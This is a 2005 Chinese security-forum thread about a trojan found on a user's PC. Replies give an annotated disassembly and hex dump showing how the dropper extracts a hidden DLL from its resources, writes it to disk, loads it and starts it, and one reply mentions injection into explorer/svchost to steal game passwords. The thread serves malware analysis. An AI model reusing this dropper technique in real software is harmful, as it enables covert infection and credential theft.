[注意]今天电脑中了这个毒!加的未知壳!-加壳脱壳-看雪-安全社区|安全招聘|kanxue.com

最新回复 (7)
闪电狼雪币： 108 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 709 粉丝 0 关注私信	闪电狼 2 楼安装一个dll文件.. 重要的应该在这里面 2005-8-1 00:11 0
学习中雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 60 粉丝 0 关注私信	学习中 3 楼能告知是什么壳吗 2005-8-1 16:33 0
fly 雪币： 898 活跃值： (4039) 能力值： ( LV9，RANK：3410 ) 在线值：发帖 294 回帖 7686 粉丝 32 关注私信	fly 85 4 楼比较忙，简单看了一下，主exe无壳。 exe运行后释放隐藏在资源中的木马DLL，加载dll使其运作 .RIF1:00401230 ; =============== S U B R O U T I N E ?===================================== .RIF1:00401230 .RIF1:00401230 .RIF1:00401230 public start .RIF1:00401230 start proc near .RIF1:00401230 .RIF1:00401230 LibFileName= byte ptr -108h .RIF1:00401230 .RIF1:00401230 sub esp, 108h .RIF1:00401236 lea eax, [esp+108h+LibFileName] .RIF1:0040123A push esi .RIF1:0040123B push eax .RIF1:0040123C call sub_401360 //释放藏在资源中的winhtm.dll .RIF1:0040123C .RIF1:00401241 add esp, 4 .RIF1:00401244 test eax, eax .RIF1:00401246 jz short loc_40127A .RIF1:00401246 .RIF1:00401248 lea ecx, [esp+10Ch+LibFileName] .RIF1:0040124C push ecx ; lpLibFileName .RIF1:0040124D call LoadLibraryA //载入木马DLL（winhtm.dll) .RIF1:0040124D .RIF1:00401253 mov esi, eax .RIF1:00401255 test esi, esi .RIF1:00401257 jz short loc_40127A .RIF1:00401257 .RIF1:00401259 push offset ProcName ; "InstallServerEx" .RIF1:0040125E push esi ; hModule .RIF1:0040125F call GetProcAddress //获取木马DLL的InstallServerEx导出函数地址 .RIF1:0040125F .RIF1:00401265 test eax, eax .RIF1:00401267 jz short loc_401273 .RIF1:00401267 .RIF1:00401269 lea edx, [esp+10Ch+LibFileName] .RIF1:0040126D push edx .RIF1:0040126E call eax //Call InstallServerEx 木马开始工作 //木马如何运作，自己去分析winhtm.dll .RIF1:0040126E .RIF1:00401270 add esp, 4 .RIF1:00401273 .RIF1:00401273 loc_401273: ; CODE XREF: start+37j .RIF1:00401273 push esi ; hLibModule .RIF1:00401274 call FreeLibrary //安装木马后就可以释放winhtm.dll .RIF1:00401274 .RIF1:0040127A .RIF1:0040127A loc_40127A: ; CODE XREF: start+16j .RIF1:0040127A ; start+27j .RIF1:0040127A push 0 ; uExitCode .RIF1:0040127C call ExitProcess //Game Over .RIF1:0040127C .RIF1:00401282 xor eax, eax .RIF1:00401284 pop esi .RIF1:00401285 add esp, 108h .RIF1:0040128B retn 10h .RIF1:0040128B .RIF1:0040128B start endp 你可以用16进制编辑工具打开此文件，偏移00002000处就是捆绑的winhtm.dll Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00002000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ?........?.. 00002010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@....... 00002020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00002030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?.. 00002040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..?.???L?Th 00002050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00002060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 00002070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... .RIF1:0040143C lea ecx, [esp+220h+FileName] .RIF1:00401440 push ecx ; lpFileName .RIF1:00401441 call sub_401290 .RIF1:00401290 ; =============== S U B R O U T I N E ?===================================== .RIF1:00401290 .RIF1:00401290 .RIF1:00401290 ; int __cdecl sub_401290(LPCSTR lpFileName) .RIF1:00401290 sub_401290 proc near ; CODE XREF: sub_401360+E1p .RIF1:00401290 .RIF1:00401290 NumberOfBytesWritten= dword ptr -4 .RIF1:00401290 lpFileName= dword ptr 4 .RIF1:00401290 .RIF1:00401290 push ecx .RIF1:00401291 push ebx .RIF1:00401292 push ebp .RIF1:00401293 push esi .RIF1:00401294 push edi .RIF1:00401295 mov edi, GetModuleHandleA .RIF1:0040129B push 100h ; lpType .RIF1:004012A0 push 64h ; lpName .RIF1:004012A2 push 0 ; lpModuleName .RIF1:004012A4 call edi ; GetModuleHandleA .RIF1:004012A4 .RIF1:004012A6 push eax ; hModule .RIF1:004012A7 call FindResourceA .RIF1:004012A7 .RIF1:004012AD mov esi, eax .RIF1:004012AF push esi ; hResInfo .RIF1:004012B0 push 0 ; lpModuleName .RIF1:004012B2 call edi ; GetModuleHandleA .RIF1:004012B2 .RIF1:004012B4 push eax ; hModule .RIF1:004012B5 call LoadResource //资源载入内存00402000处 .RIF1:004012B5 .RIF1:004012BB test esi, esi .RIF1:004012BD mov ebp, eax .RIF1:004012BF jnz short loc_4012C9 .RIF1:004012BF .RIF1:004012C1 pop edi .RIF1:004012C2 pop esi .RIF1:004012C3 pop ebp .RIF1:004012C4 xor eax, eax .RIF1:004012C6 pop ebx .RIF1:004012C7 pop ecx .RIF1:004012C8 retn .RIF1:004012C8 .RIF1:004012DE ; --------------------------------------------------------------------------- .RIF1:004012DE .RIF1:004012DE loc_4012DE: ; CODE XREF: sub_401290+44j .RIF1:004012DE push esi ; hResInfo .RIF1:004012DF push 0 ; lpModuleName .RIF1:004012E1 call edi ; GetModuleHandleA .RIF1:004012E1 .RIF1:004012E3 push eax ; hModule .RIF1:004012E4 call SizeofResource .RIF1:004012E4 .RIF1:004012EA mov ebp, eax .RIF1:004012EC mov eax, dword_401000 .RIF1:004012F1 lea edi, [eax+ebx] .RIF1:004012F4 call sub_4011C0 .RIF1:004012F4 .RIF1:004012F9 mov ecx, [esp+14h+lpFileName] .RIF1:004012FD push 0 ; hTemplateFile .RIF1:004012FF push 80h ; dwFlagsAndAttributes .RIF1:00401304 push 2 ; dwCreationDisposition .RIF1:00401306 push 0 ; lpSecurityAttributes .RIF1:00401308 push 0 ; dwShareMode .RIF1:0040130A push 40000000h ; dwDesiredAccess .RIF1:0040130F push ecx ; lpFileName .RIF1:00401310 mov [edi+1C2h], eax .RIF1:00401316 call CreateFileA //在临时目录下生成和主程序同名的dll文件 .RIF1:00401316 .RIF1:0040131C mov esi, eax .RIF1:0040131E cmp esi, 0FFFFFFFFh .RIF1:00401321 jnz short loc_40132B .RIF1:00401321 .RIF1:00401323 pop edi .RIF1:00401324 pop esi .RIF1:00401325 pop ebp .RIF1:00401326 xor eax, eax .RIF1:00401328 pop ebx .RIF1:00401329 pop ecx .RIF1:0040132A retn .RIF1:0040132A .RIF1:0040132B ; --------------------------------------------------------------------------- .RIF1:0040132B .RIF1:0040132B loc_40132B: ; CODE XREF: sub_401290+91j .RIF1:0040132B lea edx, [esp+14h+NumberOfBytesWritten] .RIF1:0040132F push 0 ; lpOverlapped .RIF1:00401331 push edx ; lpNumberOfBytesWritten .RIF1:00401332 push ebp ; nNumberOfBytesToWrite .RIF1:00401333 push ebx ; lpBuffer .RIF1:00401334 mov ebx, WriteFile .RIF1:0040133A push esi ; hFile .RIF1:0040133B call ebx ; WriteFile .RIF1:0040133B .RIF1:0040133D lea eax, [esp+14h+NumberOfBytesWritten] .RIF1:00401341 push 0 ; lpOverlapped .RIF1:00401343 push eax ; lpNumberOfBytesWritten .RIF1:00401344 push 6F4h ; nNumberOfBytesToWrite .RIF1:00401349 push edi ; lpBuffer .RIF1:0040134A push esi ; hFile .RIF1:0040134B call ebx ; WriteFile .RIF1:0040134B .RIF1:0040134D push esi ; hObject .RIF1:0040134E call CloseHandle .RIF1:0040134E .RIF1:00401354 pop edi .RIF1:00401355 pop esi .RIF1:00401356 pop ebp .RIF1:00401357 mov eax, 1 .RIF1:0040135C pop ebx .RIF1:0040135D pop ecx .RIF1:0040135E retn .RIF1:0040135E .RIF1:0040135E sub_401290 endp 2005-8-1 18:56 0
学习中雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 60 粉丝 0 关注私信	学习中 5 楼谢fly! 2005-8-1 22:32 0
天津小白雪币： 105 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 18 粉丝 1 关注私信	天津小白 6 楼程序运行以后，会在TEMP目录里生成TEST1.DLL这个文件，然后把TEST1.DLL远程注入到EXPLORER,SVCHOST的进程中应该是个偷天堂密码的木马! 2005-8-2 09:20 0
matali 雪币： 245 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 166 粉丝 0 关注私信	matali 7 楼 fly分析得很仔细呀,我菜鸟都看懂了 2005-8-3 19:16 0
sunray 雪币： 207 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 57 粉丝 0 关注私信	sunray 8 楼楼上的好熟啊 2005-8-3 22:36 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

闪电狼

雪币： 108

活跃值： (42)

能力值：

( LV2，RANK：10 )

在线值：

发帖

16

回帖

709

粉丝

0

关注

私信

闪电狼: 2 楼

安装一个dll文件..

重要的应该在这里面

2005-8-1 00:11

0

学习中

雪币： 212

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

16

回帖

60

粉丝

0

关注

私信

学习中: 3 楼

能告知是什么壳吗

2005-8-1 16:33

0

fly

雪币： 898

活跃值： (4039)

能力值：

( LV9，RANK：3410 )

在线值：

发帖

294

回帖

7686

粉丝

32

关注

私信

fly 85: 4 楼

比较忙，简单看了一下，主exe无壳。
exe运行后释放隐藏在资源中的木马DLL，加载dll使其运作

.RIF1:00401230 ; =============== S U B R O U T I N E ?=====================================
.RIF1:00401230
.RIF1:00401230
.RIF1:00401230       public start
.RIF1:00401230 start proc near
.RIF1:00401230
.RIF1:00401230 LibFileName= byte ptr -108h
.RIF1:00401230
.RIF1:00401230       sub    esp, 108h
.RIF1:00401236       lea    eax, [esp+108h+LibFileName]
.RIF1:0040123A       push esi
.RIF1:0040123B       push eax
.RIF1:0040123C       call sub_401360
//释放藏在资源中的winhtm.dll
.RIF1:0040123C
.RIF1:00401241       add    esp, 4
.RIF1:00401244       test eax, eax
.RIF1:00401246       jz    short loc_40127A
.RIF1:00401246
.RIF1:00401248       lea    ecx, [esp+10Ch+LibFileName]
.RIF1:0040124C       push ecx                   ; lpLibFileName
.RIF1:0040124D       call LoadLibraryA
//载入木马DLL（winhtm.dll)
.RIF1:0040124D
.RIF1:00401253       mov    esi, eax
.RIF1:00401255       test esi, esi
.RIF1:00401257       jz    short loc_40127A
.RIF1:00401257
.RIF1:00401259       push offset ProcName       ; "InstallServerEx"
.RIF1:0040125E       push esi                   ; hModule
.RIF1:0040125F       call GetProcAddress
//获取木马DLL的InstallServerEx导出函数地址
.RIF1:0040125F
.RIF1:00401265       test eax, eax
.RIF1:00401267       jz    short loc_401273
.RIF1:00401267
.RIF1:00401269       lea    edx, [esp+10Ch+LibFileName]
.RIF1:0040126D       push edx
.RIF1:0040126E       call eax
//Call InstallServerEx  木马开始工作
//木马如何运作，自己去分析winhtm.dll
.RIF1:0040126E
.RIF1:00401270       add    esp, 4
.RIF1:00401273
.RIF1:00401273 loc_401273:                            ; CODE XREF: start+37j
.RIF1:00401273       push esi                   ; hLibModule
.RIF1:00401274       call FreeLibrary
//安装木马后就可以释放winhtm.dll
.RIF1:00401274
.RIF1:0040127A
.RIF1:0040127A loc_40127A:                            ; CODE XREF: start+16j
.RIF1:0040127A                                        ; start+27j
.RIF1:0040127A       push 0                      ; uExitCode
.RIF1:0040127C       call ExitProcess
//Game Over
.RIF1:0040127C
.RIF1:00401282       xor    eax, eax
.RIF1:00401284       pop    esi
.RIF1:00401285       add    esp, 108h
.RIF1:0040128B       retn 10h
.RIF1:0040128B
.RIF1:0040128B start endp

你可以用16进制编辑工具打开此文件，偏移00002000处就是捆绑的winhtm.dll

Offset    0  1  2  3  4  5  6  7 8  9  A  B  C  D  E  F
00002000 4D 5A 90 00 03 00 00 00  04 00 00 00 FF FF 00 00 MZ?........?..
00002010 B8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00 ?......@.......
00002020 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ................
00002030 00 00 00 00 00 00 00 00  00 00 00 00 E0 00 00 00 ............?..
00002040 0E 1F BA 0E 00 B4 09 CD  21 B8 01 4C CD 21 54 68 ..?.???L?Th
00002050 69 73 20 70 72 6F 67 72  61 6D 20 63 61 6E 6E 6F is program canno
00002060 74 20 62 65 20 72 75 6E  20 69 6E 20 44 4F 53 20 t be run in DOS
00002070 6D 6F 64 65 2E 0D 0D 0A  24 00 00 00 00 00 00 00 mode....$.......

.RIF1:0040143C       lea    ecx, [esp+220h+FileName]
.RIF1:00401440       push ecx                   ; lpFileName
.RIF1:00401441       call sub_401290

.RIF1:00401290 ; =============== S U B R O U T I N E ?=====================================
.RIF1:00401290
.RIF1:00401290
.RIF1:00401290 ; int __cdecl sub_401290(LPCSTR lpFileName)
.RIF1:00401290 sub_401290 proc near                   ; CODE XREF: sub_401360+E1p
.RIF1:00401290
.RIF1:00401290 NumberOfBytesWritten= dword ptr -4
.RIF1:00401290 lpFileName= dword ptr  4
.RIF1:00401290
.RIF1:00401290       push ecx
.RIF1:00401291       push ebx
.RIF1:00401292       push ebp
.RIF1:00401293       push esi
.RIF1:00401294       push edi
.RIF1:00401295       mov    edi, GetModuleHandleA
.RIF1:0040129B       push 100h                   ; lpType
.RIF1:004012A0       push 64h                   ; lpName
.RIF1:004012A2       push 0                      ; lpModuleName
.RIF1:004012A4       call edi ; GetModuleHandleA
.RIF1:004012A4
.RIF1:004012A6       push eax                   ; hModule
.RIF1:004012A7       call FindResourceA
.RIF1:004012A7
.RIF1:004012AD       mov    esi, eax
.RIF1:004012AF       push esi                   ; hResInfo
.RIF1:004012B0       push 0                      ; lpModuleName
.RIF1:004012B2       call edi ; GetModuleHandleA
.RIF1:004012B2
.RIF1:004012B4       push eax                   ; hModule
.RIF1:004012B5       call LoadResource
//资源载入内存00402000处
.RIF1:004012B5
.RIF1:004012BB       test esi, esi
.RIF1:004012BD       mov    ebp, eax
.RIF1:004012BF       jnz    short loc_4012C9
.RIF1:004012BF
.RIF1:004012C1       pop    edi
.RIF1:004012C2       pop    esi
.RIF1:004012C3       pop    ebp
.RIF1:004012C4       xor    eax, eax
.RIF1:004012C6       pop    ebx
.RIF1:004012C7       pop    ecx
.RIF1:004012C8       retn
.RIF1:004012C8

.RIF1:004012DE ; ---------------------------------------------------------------------------
.RIF1:004012DE
.RIF1:004012DE loc_4012DE:                            ; CODE XREF: sub_401290+44j
.RIF1:004012DE       push esi                   ; hResInfo
.RIF1:004012DF       push 0                      ; lpModuleName
.RIF1:004012E1       call edi ; GetModuleHandleA
.RIF1:004012E1
.RIF1:004012E3       push eax                   ; hModule
.RIF1:004012E4       call SizeofResource
.RIF1:004012E4
.RIF1:004012EA       mov    ebp, eax
.RIF1:004012EC       mov    eax, dword_401000
.RIF1:004012F1       lea    edi, [eax+ebx]
.RIF1:004012F4       call sub_4011C0
.RIF1:004012F4
.RIF1:004012F9       mov    ecx, [esp+14h+lpFileName]
.RIF1:004012FD       push 0                      ; hTemplateFile
.RIF1:004012FF       push 80h                   ; dwFlagsAndAttributes
.RIF1:00401304       push 2                      ; dwCreationDisposition
.RIF1:00401306       push 0                      ; lpSecurityAttributes
.RIF1:00401308       push 0                      ; dwShareMode
.RIF1:0040130A       push 40000000h             ; dwDesiredAccess
.RIF1:0040130F       push ecx                   ; lpFileName
.RIF1:00401310       mov    [edi+1C2h], eax
.RIF1:00401316       call CreateFileA
//在临时目录下生成和主程序同名的dll文件
.RIF1:00401316
.RIF1:0040131C       mov    esi, eax
.RIF1:0040131E       cmp    esi, 0FFFFFFFFh
.RIF1:00401321       jnz    short loc_40132B
.RIF1:00401321
.RIF1:00401323       pop    edi
.RIF1:00401324       pop    esi
.RIF1:00401325       pop    ebp
.RIF1:00401326       xor    eax, eax
.RIF1:00401328       pop    ebx
.RIF1:00401329       pop    ecx
.RIF1:0040132A       retn

.RIF1:0040132A
.RIF1:0040132B ; ---------------------------------------------------------------------------
.RIF1:0040132B
.RIF1:0040132B loc_40132B:                            ; CODE XREF: sub_401290+91j
.RIF1:0040132B       lea    edx, [esp+14h+NumberOfBytesWritten]
.RIF1:0040132F       push 0                      ; lpOverlapped
.RIF1:00401331       push edx                   ; lpNumberOfBytesWritten
.RIF1:00401332       push ebp                   ; nNumberOfBytesToWrite
.RIF1:00401333       push ebx                   ; lpBuffer
.RIF1:00401334       mov    ebx, WriteFile
.RIF1:0040133A       push esi                   ; hFile
.RIF1:0040133B       call ebx ; WriteFile
.RIF1:0040133B
.RIF1:0040133D       lea    eax, [esp+14h+NumberOfBytesWritten]
.RIF1:00401341       push 0                      ; lpOverlapped
.RIF1:00401343       push eax                   ; lpNumberOfBytesWritten
.RIF1:00401344       push 6F4h                   ; nNumberOfBytesToWrite
.RIF1:00401349       push edi                   ; lpBuffer
.RIF1:0040134A       push esi                   ; hFile
.RIF1:0040134B       call ebx ; WriteFile
.RIF1:0040134B
.RIF1:0040134D       push esi                   ; hObject
.RIF1:0040134E       call CloseHandle
.RIF1:0040134E
.RIF1:00401354       pop    edi
.RIF1:00401355       pop    esi
.RIF1:00401356       pop    ebp
.RIF1:00401357       mov    eax, 1
.RIF1:0040135C       pop    ebx
.RIF1:0040135D       pop    ecx
.RIF1:0040135E       retn
.RIF1:0040135E
.RIF1:0040135E sub_401290 endp

2005-8-1 18:56

0